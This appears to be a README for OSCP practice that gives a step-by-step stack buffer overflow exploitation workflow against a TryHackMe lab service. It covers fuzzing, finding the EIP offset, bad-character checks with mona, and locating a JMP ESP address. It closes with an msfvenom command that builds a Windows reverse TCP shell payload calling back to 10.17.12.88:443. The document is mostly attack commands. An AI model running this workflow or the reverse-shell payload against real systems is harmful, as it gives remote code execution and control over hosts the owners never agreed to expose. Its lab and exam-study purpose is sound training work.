Created while preparing for OSCP to crack BOF in under 20 minutes. These 2 python scripts is all we need.
Highly recommend the buffer overflow prep room on tryhackme to practice bof.
Need pwntools for pattern create functionality
pip install --user pwntools
# Fuzz with a range to find crash point
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --range "100-2100" --range-step 100
# Confirm crash by sending fix size payload
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --size 2100
# Send a unique pattern instead of just AAAA
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --size 2100 --pattern
# find offset by providing the EIP address value like this
python fuzzer.py --find-offset "61 75 74 61"
# Test we can controll EIP by sending BBBB by default into it
python eipcontroller.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset {{1978}}
!mona config -set workingfolder c:\mona
# generate hex array using mona to compare with the payload array
!mona bytearray -cpb "\x00"
# Send full_hex array to compare and look for bad chars
python eipcontroller.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978 --check-bad-chars
# compare from the start address of full_hex array in DUMP
!mona compare -f c:\mona\PROJECT\bytearray.bin -a {{ESP VALUE + NOP ADDR}}
# Example !mona compare -f C:\mona\oscp\bytearray.bin -a 0189FA30
# Example badchar compare output
# 00 07 08 2e 2f a0 a1
# Only the first ones are confimed bad chars. 00 07 2e a0
# try only excluding those then test if aything new pops in diff between payload and initially generated bytearray.bin
# find jmp esp or equivlent in all modules excluding bad chars
# make sure memory address and payload doesn't have bad chars in it
!mona jmp -r esp -cpb "\x00\x{{BADCHARS}}"
# exmaple !mona jmp -r esp -cpb "\x00\x07\x2E\xA0"
# REVERSE THE ADDRESS TO MAKE IT LITTLE ENDIAN
# Example 0x625011af from mona output to "\xAF\x11\x50\x62"
# MANULLAY PUT IT IN eipcontroller.py
eip = "\xAF\x11\x50\x62"
# Create a break point on the found address in immunity
-> | black dotted line > Search address "625011af" > Select then F2 for breakpoint
# Test it's there
python eipcontroller.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.17.12.88 LPORT=443 EXITFUNC=thread -b '\x00\x07\x2E\xA0' -f c
# MANULLAY PUT IT IN eipcontroller.py
buf = "PAYLOAD"
python eipcontroller.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978 --nop 32